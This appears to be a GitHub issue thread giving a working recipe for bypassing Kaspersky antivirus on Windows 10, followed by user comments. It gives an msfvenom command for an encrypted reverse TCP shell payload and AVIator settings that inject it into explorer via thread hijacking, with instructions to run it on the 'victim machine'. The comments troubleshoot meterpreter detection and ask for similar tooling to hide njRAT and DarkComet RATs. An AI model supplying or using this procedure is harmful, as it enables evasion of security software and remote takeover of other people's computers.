Kaspersky AV bypass Test Case
Ch0pin opened this issue · 6 comments
Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)
Getting a shell on a Windows 10 machine running fully updated Kaspersky AV
Target Machine: Windows 10 x64
Create the payload using msfvenom
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
Use AVIator with the following settings
Target OS architecture: x64
Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)
Target procedure: explorer (leave the default)
Set the listener on the attacker machine
Run the generated exe on the victim machine
Thanks for your efforts, it's working well.
Do you have any tool like AVIator but for encrypting exe payloads like meterpreter, and also for encrypting malware servers like njRAT and DarkComet?
Thanks a lot
Not yet, but this is something that for sure I am going to implement in the very near future.
My dear,
I tested windows/meterpreter/reverse_https and reverse_tcp and there are no reverse connections.
Also, when I test x64/shell it works, there's a reverse connection, but no meterpreter channel is opened.
Once you use meterpreter, the antivirus will detect it. However, shell won't.
Maybe encoding the dropped dll is the best way.
I used x64/shell and it worked, but no channel opened although there's a reverse connection?
Make sure you are selecting the right architecture for your shellcode and for your target OS. As pple7000 said, when you use meterpreter the AV probably will detect it and drop the connection as suspicious; if you use a simple shell payload the bypass works fine. Just press a few enters after the connection is open ;)